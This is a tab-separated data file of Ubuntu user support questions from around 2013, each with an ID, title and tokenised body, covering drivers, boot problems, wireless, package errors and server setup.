337117	calendar does n't open in gnome 3	i 'm on ubuntu 12.04 and a few days back i installed the gnome 3 shell . upon clicking the date/time bar in the top centre position of the screen , there is a drop down menu which contains an option called open calendar , upon clicking that i get the following error : execution of 'evolution -c calendar ' failed : command not found . how can this be resolved ?
337118	monitor resolution is n't selectable	i 've got a 2560x1440 monitor , connected with a dual-link dvi cable . when i boot into ubuntu 13.04 , the resolution is 1600x1200 by default , and in systems settings- > displays , the highest resolution listed is 1920x1080 . how can i select the actual full resolution of 2560x1440 ? i 've got integrated intel hd 4000 graphics .
337120	diablo2 window mode using ubuntu script	i have diablo 2 installed on one of my drives which i would like to run in ubuntu , but i do n't want to have to go through terminal , every time , to start it up . i was trying to create a shell script that would just open it for me when i wanted to play it . this is what i came up with : # ! /bin/bash wine /media/84964add964acf7c/ '' program files ( x86 ) '' /diablo\ ii/diablo\ ii.exe -w when i run it i get a /bin/bash^m : bad interpreter : no such file or directory error . what am i doing wrong ? i have changed the permissions to be 755 and i run it through the command line but it will not run oh , i forgot to put in my answer , that when i run the command above in the command line it works just fine , but when i run my script it does n't work problem solved apparently when i had accidentally opened up the script in notepad it added some extra carriage returns , hence the `^m` error . deleted all the files associated with the script and redid it in `geany` and it is working just fine now .
337122	ubuntu 13.04 purple screen - installed ati driver	i 'm using ubuntu 13.04 . everything was working fine until i installed some drivers for my radeon hd 5450 . the way i installed those drivers was by going to ubuntu software center and installing `` additional drivers '' and then installing the ati driver . now when i boot up ubuntu , the grub screen comes up fine but after it a purple screen comes and it freezes there and then a black screen and it hangs there . i ca n't see anything after the purple screen since my lcd gives `` no signal '' . i tried putting `` nomodeset '' for gfx mode and in place of quiet splash , but it still gives me `` no signal '' though i hear a drum sound . i also tried going to recovery mode but my lcd does n't recognize the resolution and gives me `` no signal '' so i cant see the list of recovery options . any help would be greatly appreciated .
337123	tweaks for chrubuntu 12.04 on acer c7 ?	i recently purchased an acer c7 and installed chrubuntu 12.04 on it successfully . the laptop so far is fitting my needs ( something cheap to carry to labs/read pdfs and email with ) but it 's pretty sluggish at times . are there any tweaks to speed it up a bit , allow 720p to be more playable , etc ? i 've read lubuntu and xubuntu are built for lower end hardware , is it possible to install that ? thanks
337125	ubuntu 12.04 minecraft server hosting	can someone help me to understand how to host a minecraft server through an ip ? i am connected to the internet through not one but two routers ! on windows 7 i was used to using hamachi . is there an alternative ( in ubuntu ) to hamachi that does n't request the program itself ?
337128	mount error ( 13 ) : permission denied	i know this question has been asked before , but i 've been looking for a solution for a couple of hours now and nothing seems to be working . the frustrating thing is that it used to work on my previous install , so i know the commands i try should work . i 'm running a vanilla install of ubuntu 13.04 server . i have a server running at 192.168.1.130 and two shares : lacie and seagate 2tb . i used to have these lines in my fstab file : //192.168.1.130/seagate\0402tb /home/windows cifs user=admin , password=password , uid=1000 0 0 now that i re-installed my server , but do n't need it permanently i tried the following : sudo mount.cifs //192.168.1.130/lacie ~/lacie -o user=admin or sudo mount -t cifs -o username='admin ' , password= ' < password > ' //192.168.1.130/lacie ~/lacie however , i get the error mount error ( 13 ) : permission denied . i 'm sure the credentials are correct . nothing has changed at the windows side . also , i installed the packages samba , cifs-utils too . nothing helped .
337135	backup restore fails after update	i wanted to install windows xp beside ubuntu , so i desided to make an backup using daja vu and overwrite ubuntu and install windows and again ubuntu ( this time beside windows ) and restore the backup.all worked fine untill i wanted to restore the backup.deja vu said that the restoring was not succesfull because of an unknown error . can anyone help ?
337147	throttlestop for ubuntu ?	i was able to install and dual boot windows 7 and ubuntu 13.04 ( both x64 ) just a while ago . as a newbie in ubuntu , i 'm still searching for ways to install my games because i 'm planning to make ubuntu my main os because it 's like really cool and smooth and uses less resources . so , i was wondering if there are softwares that are similar to throttlestop . i need it because my laptop throttles upon reaching 75c ( processor ) . i play heavy games so , i need to stop it from throttling . of course i 'm not trying to kill my laptop . i adjust my multiplier so that it wont reach as much as 95c . nothing much i can do . i 'm just making the most out of my laptop since i ca n't buy a new one yet . i do n't have a job : | i 'm still just a student . anyways , is there any software similar to throttlestop so that i can adjust the multiplier and disable throttling .
337150	problem with ubuntu software center -- ca n't install anything	about 3 weeks ago i downloaded ubuntu 12.04 and i 've been running it since then . initially everything worked great , but about 10 days ago the ubuntu software center quit working ( i previously used it with no problems ) .now , i can open it up and find programs , but when i click the install button for one of them , nothing happens . this issue seems to be specific to the software center -- i can still use apt-get from the command line with no problems . i 've tried removing and reinstalling the software center , and i 've tried running it from the terminal using sudo software-center ( in case there was some issue with permissions ) . when i use the terminal , upon starting up software-center a long error message is printed to the terminal ( yes , an apparently identical traceback is printed twice ) : 2013-08-25 12:38:50,829 - softwarecenter.ui.gtk3.app - info - setting up proxy 'none' 2013-08-25 12:38:50,833 - softwarecenter.db.database - info - open ( ) database : path=none use_axi=true use_agent=true 2013-08-25 12:38:51,079 - softwarecenter.backend.reviews - warning - could not get usefulness from server , no username in config file 2013-08-25 12:38:51,178 - softwarecenter.ui.gtk3.app - info - show_available_packages : search_text is '' , app is none . 2013-08-25 12:38:51,181 - softwarecenter.db.pkginfo_impl.aptcache - info - aptcache.open ( ) traceback ( most recent call last ) : file `` /usr/lib/python2.7/dist-packages/dbus/connection.py '' , line 607 , in msg_reply_handler *message.get_args_list ( ) ) ) file `` /usr/lib/python2.7/dist-packages/dbus/bus.py '' , line 69 , in error_cb callback ( '' ) file `` /usr/share/software-center/softwarecenter/backend/installbackend_impl/aptd.py '' , line 153 , in _register_active_transactions_watch apt_daemon = client.get_aptdaemon ( bus=bus ) file `` /usr/lib/python2.7/dist-packages/aptdaemon/client.py '' , line 1696 , in get_aptdaemon false ) , file `` /usr/lib/python2.7/dist-packages/dbus/bus.py '' , line 241 , in get_object follow_name_owner_changes=follow_name_owner_changes ) file `` /usr/lib/python2.7/dist-packages/dbus/proxies.py '' , line 248 , in __init__ self._named_service = conn.activate_name_owner ( bus_name ) file `` /usr/lib/python2.7/dist-packages/dbus/bus.py '' , line 180 , in activate_name_owner self.start_service_by_name ( bus_name ) file `` /usr/lib/python2.7/dist-packages/dbus/bus.py '' , line 278 , in start_service_by_name 'su ' , ( bus_name , flags ) ) ) file `` /usr/lib/python2.7/dist-packages/dbus/connection.py '' , line 651 , in call_blocking message , timeout ) dbus.exceptions.dbusexception : org.freedesktop.dbus.error.spawn.childexited : launch helper exited with unknown return code 1 traceback ( most recent call last ) : file `` /usr/lib/python2.7/dist-packages/dbus/connection.py '' , line 607 , in msg_reply_handler *message.get_args_list ( ) ) ) file `` /usr/lib/python2.7/dist-packages/dbus/bus.py '' , line 69 , in error_cb callback ( '' ) file `` /usr/share/software-center/softwarecenter/backend/installbackend_impl/aptd.py '' , line 153 , in _register_active_transactions_watch apt_daemon = client.get_aptdaemon ( bus=bus ) file `` /usr/lib/python2.7/dist-packages/aptdaemon/client.py '' , line 1696 , in get_aptdaemon false ) , file `` /usr/lib/python2.7/dist-packages/dbus/bus.py '' , line 241 , in get_object follow_name_owner_changes=follow_name_owner_changes ) file `` /usr/lib/python2.7/dist-packages/dbus/proxies.py '' , line 248 , in __init__ self._named_service = conn.activate_name_owner ( bus_name ) file `` /usr/lib/python2.7/dist-packages/dbus/bus.py '' , line 180 , in activate_name_owner self.start_service_by_name ( bus_name ) file `` /usr/lib/python2.7/dist-packages/dbus/bus.py '' , line 278 , in start_service_by_name 'su ' , ( bus_name , flags ) ) ) file `` /usr/lib/python2.7/dist-packages/dbus/connection.py '' , line 651 , in call_blocking message , timeout ) dbus.exceptions.dbusexception : org.freedesktop.dbus.error.spawn.childexited : launch helper exited with unknown return code 1 2013-08-25 12:38:53,215 - softwarecenter.ui.gtk3.widgets.exhibits - warning - download failed : ' < class 'gi._glib.gerror ' > ' , 'operation not supported' any suggestions ? edit : after searching some more , i found this bug report : https : //bugs.launchpad.net/ubuntu/+source/software-center/+bug/1085425 it describes symptoms similar to mine , and i found that when i ran /usr/lib/ubuntu-sso-client/ubuntu-sso-login as described there , i got a series of error messages , ending with : importerror : no module named pkg_resources i then found this stackoverflow thread : http : //stackoverflow.com/questions/7446187/no-module-named-pkg-resources where i was able to use the top comment to re-install setuptools , which fixed my problem .
337156	how to run deja-dup in gtk and debug mode ?	as in the title i 'm looking for a way to start deja-dup in gtk mode also in debugging mode . excuse me if there was a question like this , but after an hour of research i could find a single one . using ubuntu server 12.04
337157	how to remove windows entry from boot	my system was a dual boot system ubuntu and windows . now that i have removed windows but the thing is thing i just formated the drive from within the ubuntu . but during boot the windows entry is still appearing during boot . how to remove the windows entry from boot grub .
337164	installing xampp on ubuntu	i am trying to install xampp 1.8.2-1-installer.run on a 32bit ubuntu os . when i type from root sudo tar xvfz xampp-linux-1.8.2.tar.gz -c /opt tar ( child ) : xampp-linux-1.8.2.tar.gz : can not open : no such file or directory tar ( child ) : error is not recoverable : exiting now tar : child returned status 2 tar : error is not recoverable : exiting now this is what i get when type ls xampp-linux-x64-1.8.2.-1-intaller ( 1 ) .run xampp-linux-x64-1.8.2.-1-intaller ( 1 ) .run~ xampp-linux-x64-1.8.2.-1-intaller ( 1 ) .run.part xampp-linux-x64-1.8.2.-1-intaller ( 1 ) .run
337167	prevent folder deletion for the owner of a folder	let 's assume that i have a webhosting server running on my ubuntu 13.04 system . for each customer i get that wants to host a website on my server i create a user and add it to a group called 'customers ' . all of these customers get a private folder in my /home/ folder , in which there is a folder tree that should not be deleted . so let 's say that one of my customers ' name is bob . he will get /home/bob/ as his private folder , but that folder should also contain a folder tree like this : /home/bob/ | |- > /www/ | |- > /bobsdomain.com/ | | | |- > /public_html/ | |- > /cgi_bin/ | |- > /bobsotherdomain.com/ | |- > /public_html/ |- > /cgi_bin/ bob should obviously be the owner of /home/bob because otherwise bob could n't create or delete files and folders inside his home folder . however , everything between /www/ and /public_html/ or /cgi_bin/ should never be removed . everything from /public_html/ or /cgi_bin/ and down should be bob 's choice wether he wants to delete it or not . in order to do this , could i just set the folders between /www/ and /public_html/ or /cgi_bin/ as property of root , or would that cause bob being unable to add files to the /public_html/ and /cgi_bin/ folders ? if this is not possible , in what other way should i do this ?
337169	what is wrong with my terminal	i 've tried to paste sudo command into it but no joy , nothing happens i 've copied exactly sudos others have posted but nothing
337175	should i install privative nvidia drivers if i 'm using bumblebee ?	i 'm using ubuntu 12.04 , and i have bumblebee installed . i 've recently realized that `` additional drivers '' has finally detected my nvidia geforce gt 630m gpu , and it is asking me to install vdpau stuff . i do n't know whether it 's safe installing it this way . is it going only to add vdpau support , or is the proprietary driver going to be used instead of bumblebee ?
337179	downloading java jre	today , i have been trying to install java jre . i have meet some problems . i downloaded the file from java 's website . the file name is jre-7u25-linux-i586.tar.gz . i then extracted the file and have it in my downloads . i know would like to complete the download , but how do complete this last step ?
337182	how to open a program to a particular workspace ( say3 ) from the terminal ?	i want to open firefox from terminal to workspace number 3 , is there any command for this ? i know that to launch an application i neeed to use this command : sudo firefox & now i want the application to be launched in a particular workspace , say ( 3 ) is there any command for that ? ? ?
337183	ubuntu 12.04 lts ca n't get wireless working on dell latitude d620	i was trying to get ubuntu working on old laptop . i believed it 's wireless driver issue . output from a couple of commands : myhost @ ubuntu : ~ $ lsb_release -a no lsb modules are available . distributor id : ubuntu description : ubuntu 12.04.3 lts release : 12.04 codename : precise myhost @ ubuntu : ~ $ lspci | grp network 0c:00.0 network controller : broadcom corporation bcm4311 802.11b/g wlan ( rev 01 ) myhost @ ubuntu : ~ $ iwconfig eth0 no wireless extensions . lo no wireless extensions . then i google it and found article to reinstall wireless driver at how to install broadcom wireless drivers so i did command sudo apt-get purge bcmwl-kernel-source ( done ) and command sudo apt-get install bcmwl-kernel-source ( error as below lines ) ... loading new bcmwl-6.20.155.1+bdcom dkms files ... first installation : checking all kernels ... building only for 3.8.0-29-generic building for architecture x86_64 building initial module for 3.8.0-29-generic error ! bad return status for module build on kernel : 3.8.0-29-generic ( x86_64 ) consult /var/lib/dkms/bcmwl/6.20.155.1+bdcom/build/make.log for more information . fatal : module wl not found . fatal : error running install command for wl any suggestion to fix it ? thanks first .
337191	when i click on `` brightness and lock '' icon , system settings disappears	i did fix the appearances but the brightness and lock is now broken . after installing gnome classic and gnome . i then uninstall gnome classic and gnome but it was still broken .
337194	installing firefox beta , and not replacing stable firefox	i want to test beta version of firefox but i do n't want to replace the stable version . however the .deb firefox beta have same package name , so it replaces old version . is there a way to install both beta and stable versions ?
337195	ubuntu boots inmediatly in my dual-boot system	just installed ubuntu 12.04 on my computer . when i restart i do not have the option to go to either windows or ubuntu . i get a black screen witch is displayed on the top left corner : 7.691547 kvm : disabled by bios . then ubuntu boots up ... i am new to ubuntu and have installed it beside my existing operating system and letting the default installation settings do the job . how can i have the option to choose between operating systems when i reboot or turn on my computer .
337196	do i use ext4 for all partitions ( such as / and /boot ) ? what are the other formats used for ?	i 'm installing ubuntu onto a new laptop with 24gb ssd and a 500gb hdd . i wanted to put / and swap onto the ssd and /home onto the hdd . is there anything i should n't use ext4 for ? i do not ever intend to dual boot . ubuntu only .
337198	is `` sudo apt-get update '' mandatory before every package installation ?	i know what the purpose of the update command is , and i was just wondering if i must use it before any package installation i perform . what if i have not update for too long and install some critical packages ? also , is there any occasion that there is no need to do that ?
337204	cron.daily jobs not running	i created 3 daily cron jobs to run . below are the three that are placed in etc/cron.daily rkhunter.sh # ! /bin/sh ( rkhunter -- versioncheck rkhunter -- update rkhunter -- cronjob -- report-warnings-only ) | mail -s 'rkhunter daily run ( my server ) ' me @ email.com chkrootkit.sh # ! /bin/bash chkrootkit | mail -s `` chkrootkit daily run ( my server ) '' me @ email.com logwatch.sh # ! /bin/sh ( logwatch ) | mail -s 'logwatch daily log ( my server ) ' me @ email.com i replaced me @ email.com ofcourse with my email . if i run this cronjob manually it works fine ./nameoffile.sh but it does n't run daily , what can be the cause or how can i check into this ?
337212	typical installation size	i have ubuntu 10.04 installed on my laptop with the following disk organization : 20 gb for / 5 gb for /home the large root i have was intended in principle for installing large pieces of scientific software , but in fact i do n't have any of that software installed currently . i have checked my disk space for installing ubuntu 12.04 and i have found that it takes ~15 gb . i have checked on the web that a typical installation should be ~4-6 gb . my question is : how can it be ? i do n't have big pieces of software , i have also removed the office suite to have more space . i keep all my data somewhere else . my installation is pretty minimal . i have already removed all the old kernel and header files , cleaned with apt-get autoremove and removed any unused piece of software with computer janitor . edit : in fact i found 4.5gb of scientific software i had forgotten about , nonetheless the installation would be 10.5 gb without those pieces of software , that seems still a lot to me . i also have the full tetex-latex installed . the upgrade to 12.04 require 5gb of space , and i had to remove 3.5gb of that optional software i had . now i have the following : filesystem size used avail use % mounted on /dev/sda8 20g 15g 4.3g 78 % / udev 993m 4.0k 993m 1 % /dev tmpfs 401m 860k 400m 1 % /run none 5.0m 0 5.0m 0 % /run/lock none 1003m 7.0m 996m 1 % /run/shm /dev/sda6 5.0g 4.1g 612m 88 % /home that 15gb still look like a lot , it is 3.5gb more than v10.04 output of sudo du -hs -- exclude=/proc /* 8.6m /bin 32m /boot 0 /cdrom 460k /core 4.0k /dev 20m /etc 0 /gl_driver.so 0 /initrd.img 176m /lib 4.4m /lib64 16k /lost+found 32k /media 458m /opt 116k /path 19m /root 1.1m /run 9.3m /sbin 4.4g /scratch 4.0k /selinux 200k /srv 0 /sys 104k /tmp 6.6g /usr 520m /var 0 /vmlinuz
337213	troubleshooting proprietary nvidia 319.49 driver	though i would prefer to use the open-source nouveau drivers , the support for my 485m chip has not proved fruitful in the past . because nvidia 's driver repository is somewhat dated , i downloaded the latest ( recommended , not beta ) driver install package/script from the official site . i then booted into recovery and ran the installer with no hiccups save for one warning regarding the failure to run a `` distribution-provided pre-install script . '' the install completed successfully with no warnings or errors , and i was sure to build the kernel module and even ran update-initramfs -u to ensure a proper boot . however , after selecting ubuntu from grub , all that is presented is a blank screen with a blinking underscore cursor in the top left corner . after searching around a bit , i 've learned that others experiencing problems with the proprietary drivers in ubuntu ( and mint ) are often presented with tty error screens during boot displaying some level of verbosity concerning displays , or experience a full graphical boot plagued by blinking/flashing images . i also learned that some problems may be present with the proprietary driver on notebook systems . has anyone had a similar experience with this or previous version of the nvidia proprietary driver on ubuntu/debian-based [ or otherwise ] linux systems ? does anything come to mind that might resolve the issue ? i am running a 64-bit system under ubuntu 13.04 with an intel core i7-2920xm chipset and a nvidia gtx 485m graphics card .
337215	e : sub-process /usr/bin/dpkg returned an error code ( 2 )	when trying to run sudo apt-get upgrade my computer returns an error that i am not sure how to fix . i tried to uninstall wine a short while back , but clearly things did not go as intended . i had previously installed playonlinux , but i never got anything to work on it . can anyone make heads or tails of this problem ? $ sudo apt-get upgrade reading package lists ... done building dependency tree reading state information ... done the following packages have been kept back : intel-linux-graphics-installer libopenscenegraph80 the following packages will be upgraded : activity-log-manager-common activity-log-manager-control-center apport apport-gtk bamfdaemon command-not-found command-not-found-data gir1.2-dbusmenu-glib-0.4 gir1.2-dbusmenu-gtk-0.4 gnome-control-center-unity gnome-screenshot google-chrome-stable libbamf3-1 libdbusmenu-glib4 libdbusmenu-gtk3-4 libdbusmenu-gtk4 libdvdnav4 libplymouth2 libunity-2d-private0 libunity-core-6.0-5 libwhoopsie0 lsb-base lsb-release passwd plymouth plymouth-label plymouth-theme-ubuntu-logo plymouth-theme-ubuntu-text python-apport python-problem-report python3-apport python3-commandnotfound python3-problem-report unity unity-2d unity-2d-common unity-2d-panel unity-2d-shell unity-2d-spread unity-common unity-lens-applications unity-services whoopsie 43 upgraded , 0 newly installed , 0 to remove and 2 not upgraded . need to get 0 b/47.4 mb of archives . after this operation , 3,360 kb of additional disk space will be used . do you want to continue [ y/n ] ? y extracting templates from packages : 100 % dpkg : parse error , in file '/var/lib/dpkg/status ' near line 4794 package 'wine1.6-i386 ' : `depends ' field , invalid package name `wine1.6 : any ' : character ` : ' not allowed ( only letters , digits and characters `-+._ ' ) e : sub-process /usr/bin/dpkg returned an error code ( 2 )
337217	unable to install ubuntu 13.04 from external drive	i 've got a samsung 900x ultra-book with windows 8 pro preinstalled and wanted to install ubuntu 13.04 alongside ( as dual-boot ) from a dvd which came with a linux-ubuntu special edition of a magazine . but i can not make my ultra-book boot from an external dvd-drive . i already looked into the uefi-firmware settings . but as i am a total newbie , i am not sure what i have got to change in order to be able to boot from a different source than my ssd . can somebody help me ?
337220	ca n't download ubuntu server 13.04 32-bit	tried downloading ubuntu server edition ( 32 bit ) to run in a vm . because the vm will be 32-bit but the downloading computer has been correctly detected as 64-bit , i had to go to the server releases page instead of just clicking a button . when i did , i encountered a broken link to http : //ddj9plya1d2mr.cloudfront.net/ubuntu-13.04-server-i386.iso
337221	asus n53sn nvidia optimus settings ?	i have asus n53sn which has 2 graphics card intel and geforce gt550m and used bumblebee . but i have a problem which i dont know when intel or geforce is going to work . is there any way for me to select intel or geforce when i want ? using ubuntu 13.04 64 bit
337223	computer can not boot to ubuntu 13.04 after installing netflix-desktop and later wine	can anyone help me with this issue ? issue : black screen after boot attempt from grub ( can not boot ubuntu , not even in failsafe mode ) process to get to issue : on ubuntu 13.04 , i installed netflix-desktop following this procedure ; netflix app did n't show up in unity dash , so i uninstalled and reinstalled , still to no avail . immediately after , i installed wine , following this procedure . since the netflix app was still nowhere to be found , i uninstalled wine and reinstalled it . nothing ... so i restarted ubuntu , only to find out that ever since i can not boot . i 've tried several of the options in advanced options for ubuntu on the grub menu but nothing . i have a computer with windows 8 pro dual-boot so i 'm able to keep searching for answers online , but i ca n't seem to use ubuntu anymore and will have to resign and reinstall ubuntu somehow . thank you for taking time in looking at my issue .
337224	serial port can receive but wo n't transmit	i am running a copy putty on a windows 7 and a linux box . i have a 3rd linux box set up where it displays the console in text mode over the serial port . i can use putty on the windows box to the serial linux , and it works just fine . i go from the linux box using putty to the serial linux box , and i can see the text coming into putty from the serial linux box , like when it boots up , but i ca n't transmit anything from the linux running putty . i also tried to go from the linux box with putty to the windows box with putty to verify that the linux box with putty is not transmitting characters . i checked all the settings side by side with both putty 's and they are pretty much the same .
337225	how to remove a default action in thunar ?	i read the explanation to add a custom action , and how to remove them . but i 'd like to remove the `` delete '' custom action to keep only those i want . is it possible to remove defaults custom actions , or to select them or do we have to keep some custom actions like `` delete '' or others ? and if yes , how can we manage ?
337227	`` more '' menu does n't appear in ubuntu one browser interface , then how can i access the dropdown menu ?	i 'm trying to remove a folder from my u1 storage . i 've read that i should go to u1 in my browser , click `` more '' next to the folder , and a relevant dropdown will appear . it does n't . with files , yes , there is a more dropdown , it gives options to delete or download the file . but with folders , there is no dropdown . all that happens when i click `` more '' next to a folder is that a blank line appears under the folder , and if i click `` more '' again the blank line disappears . i assume that 's a bug ... ? or is it meant to be like that and i 'm missing something ? whatever , the result is that i ca n't do what i want , which is to completely remove a folder from u1 .
337238	ubuntu 12.04 lts ca n't find my wireless card or the network after i shutdown and turn my system back on	ubuntu boots up and does n't find any available wireless network and it does n't recognize my wireless card either . however , when i open the terminal and type : sudo modprobe b43 it finds my wireless card and all of the available networks around me and everything is cool ... until i shutdown my system . when i shutdown and then turn my computer back on it completely forgets about the network i just found and told it to connect automatically to . so , back to the terminal to find the wireless card and networks manually . every . single . time . how do i configure my system so that i do n't have to manually find the wireless card and connect to my network every time i restart my computer ? output from terminal : root @ jake-xps-m1530 : /home/jake # dmesg | grep b43 [ 8.684953 ] b43-phy0 : broadcom 4312 wlan found ( core revision 15 ) [ 8.728075 ] b43-phy0 : found phy : analog 6 , type 5 ( lp ) , revision 1 [ 20.116128 ] b43-phy0 : loading firmware version 666.2 ( 2011-02-23 01:15:07 ) root @ jake-xps-m1530 : /home/jake #
337244	grub rescue no such device , also can not access bios	i purchased an acer aspire m5-481pt-6688 which came preloaded with windows 8 . i wiped that , reinstalled my own bloatware-free copy , and tried to dual boot ubuntu 13.04 on it . it has a hybrid drive , so when i installed it running alongside windows , ubuntu was installed to the ssd and windows is on the hhd . i later removed ubuntu via formatting the ssd and now i 'm stuck at the grub rescue . the error says : no such device . no matter what key combo i press ( f2 , f8 , f10 , f12 , esc , del ) i can not access my bios nor can i boot from the cd/dvd drive or usb .
337246	bootloader install failed - raid	i am trying to install ubuntu 13.04 on a desktop with hardware raid ( 3 disks in raid 5 ) . i believe i have an ich8 chipset , if that is relevant . so , i created an install usb stick with startup disk creator with the amd64 ubuntu desktop image . i proceed through the install , select to erase everything and install ubuntu ( no lvm , no encryption , or anything like that ) . the install seems to go fine , until the very end , i get an error that says `` failed to install grub '' unable to install grub in i think it initially tried /dev/sda , but then i got a menu where i could select a net partition . i tried other selections , but nothing seemed to work . do i need to unmount something to install grub ? screenshot with other install path candidates : bootloader install failed here is the output of ls -l /dev/mapper ubuntu @ ubuntu : ~ $ ls -l /dev/mapper total 0 crw -- -- -- - 1 root root 10 , 236 aug 25 06:48 control brw-rw -- -- 1 root disk 252 , 0 aug 25 14:17 isw_bifaeaafcc_volume0 brw-rw -- -- 1 root disk 252 , 1 aug 25 14:17 isw_bifaeaafcc_volume0p1 brw-rw -- -- 1 root disk 252 , 2 aug 25 14:17 isw_bifaeaafcc_volume0p2 brw-rw -- -- 1 root disk 252 , 3 aug 25 14:17 isw_bifaeaafcc_volume0p5 ubuntu @ ubuntu : ~ $ i eventually selected `` continue without a bootloader . '' in hopes that i can figure out how to install grub post-install . any ideas on getting grub installed , so this system will boot ? please let me know if you need any further details or system specs . edit : here is the output from /var/log/syslog during the failure aug 25 23:03:50 ubuntu grub-installer : info : architecture : amd64/generic aug 25 23:03:50 ubuntu grub-installer : info : mounting /proc into /target aug 25 23:03:50 ubuntu ubiquity : grub-probe : error : failed to get canonical path of /dev/mapper/isw_bifaeaafcc_volume0p1 . aug 25 23:03:51 ubuntu ubiquity : grub-probe : error : aug 25 23:03:51 ubuntu ubiquity : aug 25 23:03:51 ubuntu ubiquity : failed to get canonical path of /dev/mapper/isw_bifaeaafcc_volume0p1 aug 25 23:03:51 ubuntu ubiquity : . aug 25 23:03:51 ubuntu ubiquity : file descriptor 3 ( pipe : [ 140038 ] ) leaked on lvdisplay invocation . aug 25 23:03:51 ubuntu ubiquity : parent pid 17588 : /bin/sh aug 25 23:03:51 ubuntu ubiquity : aug 25 23:03:51 ubuntu ubiquity : volume group `` isw_bifaeaafcc_volume0p1 '' not found aug 25 23:03:51 ubuntu ubiquity : aug 25 23:03:51 ubuntu ubiquity : aug 25 23:03:51 ubuntu ubiquity : skipping volume group isw_bifaeaafcc_volume0p1 aug 25 23:03:51 ubuntu ubiquity : aug 25 23:03:51 ubuntu grub-installer : info : identified partition label for /dev/mapper/isw_bifaeaafcc_volume0p1 : loop aug 25 23:03:52 ubuntu grub-installer : dpkg : warning : ignoring request to remove grub which is n't installed aug 25 23:03:52 ubuntu grub-installer : dpgkg : warning : ignoring request to remove grub-legacy which is n't installed aug 25 23:03:52 ubuntu grub-installer : dpkg : warning : ignoring request to remove grub-efi which is n't installed aug 25 23:03:52 ubuntu grub-installer : dpkg : warning : ignoring request to remove grub-efi-amd64-bin which is n't installed aug 25 23:03:52 ubuntu grub-installer : dpkg : warning : ignoring request to remove grub-efi-amd64 which is n't installed aug 25 23:03:52 ubuntu grub-installer : dpkg : warning : ignoring request to remove grub-efi-amd64-signed which is n't installed aug 25 23:03:52 ubuntu grub-installer : dpkg : warning : ignoring request to remove grub-efi-ia32-bin which is n't installed aug 25 23:03:52 ubuntu grub-installer : dpkg : warning : ignoring request to remove grub-efi-ia32 which is n't installed aug 25 23:03:53 ubuntu grub-installer : info : installing grub on '/dev/mapper/isw_bifaeaafcc_volume0p1' aug 25 23:03:53 ubuntu grub-installer : info : grub-install does not support -- no-floppy aug 25 23:03:53 ubuntu grub-installer : info : running chroot /target grub-install -- force `` /dev/mapper/isw_bifaeaafcc_volume0p1 '' aug 25 23:03:54 ubuntu grub-installer : path `/boot/grub ' is not readable by grub on boot . installation is impossible . aborting . aug 25 23:03:54 ubuntu grub-installer : error : running 'grub-install -- force `` /dev/mapper/isw_bifaeaafcc_volume0p1 '' ' failed .
337251	getting boot error when booting 13.04 live iso	i 'm currently running 13.04 ubuntu gnome edition and i want to go to a x64 version of regular ubuntu . im using the startup disk creator to make my bootable disk and i 've even tried unetbootin but that give me the same error message on boot : `` boot error '' . i have set my bios to boot usb devices first , and the only usb conencted is the one with the bootable file system in it , and i am at a loss . i dont know what to try next so i turned here . also , i have booted from usb many times before on this cpu so i am sure that it is capable .
337256	gksu -w does n't work the way i am used to ?	i have used gksu -w shutdown -hp now as a system-wide menu command in icewm , so that when a non-admin user clicked the shutdown from the menu , a password dialogue box will appear asking for the admin password . that was when i was running icewm in linux mint . when i switched to ubuntu , the same command would n't work . although the same dialogue box asking for admin password appears , but none of the existing sudoers password i tried would work or accepted . even the password of the first account i was asked to make on installation of ubuntu would n't work . i have also tried gksu -u admin-user -w 'shutdown -hp now , but the error message `` shutdown : need to be root '' came up . so what is the difference between ubuntu 's and mint 's gksu rules ? i 'm currently using ubuntu 12.04 lts , and the mint i 'm referring to is mint 13 maya . and what could be other alternative ways to allow a shutdown command in the icewm menu for non-admin users , but i still want them to ask permission first from me before they could shutdown , by asking for my admin password ? besides shutdown , i also have other commands in the icewm menu that require admin privileges , like hibernate , to mount a backup partition , and synaptic , which i applied gksu -w with .
337266	exclude directory from unity search	i am re-asking this question : how to remove a specific folder from the ubuntu search ? because i do not believe it was a duplicate , or was answered in that post . this has nothing to do with zeitgeist or recent files . ( i already have zeitgeist and file history monitoring disabled . ) i would like to know if it is possible to prevent unity search from displaying the contents of a specific directory in its search results - ie : not to include that directory when searching . the same way you can tell it not to include online search results . thanks /h
337273	automatically switch keyboard to match language of surrounding text	is there a functionality in some windows writing applications that changes keyboard layout . like this : http : //office.microsoft.com/en-001/word-help/turn-on-automatic-language-options-ha010354274.aspx # _toc311028922 is there a simiar functionlity in ubuntu or any ubuntu sotfware . i 'm looking for any add-on or an option that activates such a functionality in libreoffice . someone said linux softwares can not change keyboard layout because a linux os is kind of autocratic about system options and keyboard layout . but i think it is possible because plasma desktop does it .
337276	has anyone installed ubuntu on atom/celeron-based slate pc ?	i 'm going to buy one of following slate pc for ubuntu system . has anyone installed ubuntu 12.x lts or later on following machine ? it is just for doing simple coding + qt application use . 3d support is welcome , however , it is not essential . gigabyte wintelslate hp elitepad lenovo thinkpad tablet 2 acer w5500/510 -hyon
337277	try ubuntu from disk	downloaded ubuntu and burned iso disk . i have a desktop and laptop computer , both with windows xp sp3 . i wanted to try running ubuntu from the disk . on the desktop i get past the screen where i select english . it starts to present the ubuntu wallpaper then goes to a screen with a pixelated orangish screen and stops loading . tried to on my laptop . get past the language screen and get an error message and have to close ubuntu . have tried to run it on both computers several times and get the same problems each time . any way to get this to run without installing it on the computer ?
337280	vncviewer tunneling command failed	command : vncviewer -via 192.168.x.x @ administrator localhost:0 ssh : connect to host administrator port 22 : no route to host vncviewer : tunneling command failed : /usr/bin/ssh -f -l 5599 : localhost:5900 192.168.x.x @ administrator sleep 20 . how can we fix this ?
337281	installing eclipse kepler	i need some help to set up the eclipse kepler 4.3 on xubuntu , i whould like to do it by the command terminal . which are the right commands ?
